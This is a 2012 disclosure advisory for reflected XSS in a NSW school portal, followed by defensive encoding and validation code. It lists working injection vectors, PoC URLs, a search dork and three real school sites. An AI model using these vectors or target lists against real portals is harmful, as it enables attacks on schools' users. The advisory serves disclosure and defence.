School Website Solutions Cross Site Scripting

2012.04.24
Credit: Phizo
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

===============================================================
= # Exploit Title: SWS - Cross Site Scripting vulnerabilities =
= # Date: 23/04/2012                                          =
= # Author: Phizo                                             =
= # Manufacturer: www.schoolwebsitesolutions.com              =
= # Version: Latest (Private software, no version number)     =
= # Category: webapps                                         =
= # Google dork: inurl:schools.nsw.edu.au/sws/                =
= # Tested on: Windows 7 & Ubuntu 10.04 - (Firefox 11.0)      =
===============================================================

[+] Information:

SWS is a private portal software created for NSW schools only, hence why I could not gather details such as the version of the software. Multiple XSS vulnerabilities will be shown to show the insecurity of the portal software.

[+] Details:

========
Search -- (Value contained within script tags)
========

# PoC:
http://victim/search?search=[XSS]

# Vulnerable code:
a.execute("VALUE"); -- VALUE is the value of user input.

# Vector used:
'); alert("XSS"); ('

# Output:
a.execute("");alert("XSS");("");

==========
Calendar
==========

# PoC:
http://victim/calendar?p_p_col_count=3&p_p_col_id=column-1&p_p_col_pos=2&p_p_id=eppvanillacalendarportlet_WAR_eppvanilladefaultportlet&p_p_lifecycle=0&p_p_mode=view&p_p_state=normal&startdate=23-3-2012">[XSS]

# Vulnerable code: (multiple hyperlinks, however I will provide one).
<a href="http://victim/calendar?p_p_id=eppvanillacalendarportlet_WAR_eppvanilladefaultportlet&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&startdate=23-3-2012&print=true" target="_blank" class="printmonth">Print this page</a>

# Vector used:
"><script>alert("XSS")</script>

# Output:
<a href="http://victim/calendar?p_p_id=eppvanillacalendarportlet_WAR_eppvanilladefaultportlet&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&startdate=23-3-2012"><script>alert("XSS")</script>&print=true" target="_blank" class="printmonth">Print this page</a>

[+] Example sites:

http://www.cook-s.schools.nsw.edu.au/
http://www.lawrenceha-s.schools.nsw.edu.au/
http://www.parameadow-s.schools.nsw.edu.au/

References:

http://www.schoolwebsitesolutions.com
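
The two sinks in the advisory sit in different output contexts (a JavaScript string literal inside a script block, and a double-quoted href attribute), so each needs its own encoder. The following is an added example, not SWS code and not part of the original advisory; the function names and the d-m-yyyy check on startdate are assumptions based on the PoC URLs.

```javascript
// Added example: context-aware output encoding for the two reflected sinks.
// All function names are hypothetical; this is not the portal's code.

// Sink 1 (search): value is written inside a JavaScript string literal.
// Every non-alphanumeric UTF-16 unit becomes \uXXXX, so quotes, parentheses
// and "</script>" can neither close the literal nor end the script block.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) =>
    "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Sink 2 (calendar): value is written inside a double-quoted HTML attribute.
function encodeForHtmlAttr(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Input validation (assumption): startdate looks like 23-3-2012 in the PoC,
// so accept only d-m-yyyy and refuse anything else instead of reflecting it.
function parseStartDate(raw) {
  return /^\d{1,2}-\d{1,2}-\d{4}$/.test(String(raw)) ? String(raw) : null;
}

// Hardened form of: a.execute("VALUE");
function renderSearchScript(search) {
  return 'a.execute("' + encodeForJsString(search) + '");';
}

// Hardened form of the "Print this page" link. Returns null for a bad date.
function renderPrintLink(base, startdate) {
  const safeDate = parseStartDate(startdate);
  if (safeDate === null) return null;
  const url = base + "?startdate=" + encodeURIComponent(safeDate) + "&print=true";
  return '<a href="' + encodeForHtmlAttr(url) +
    '" target="_blank" class="printmonth">Print this page</a>';
}
```

Validation and encoding are both applied on the calendar path: the format check rejects unexpected input early, and the attribute encoder still protects the href if the accepted format is ever widened.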

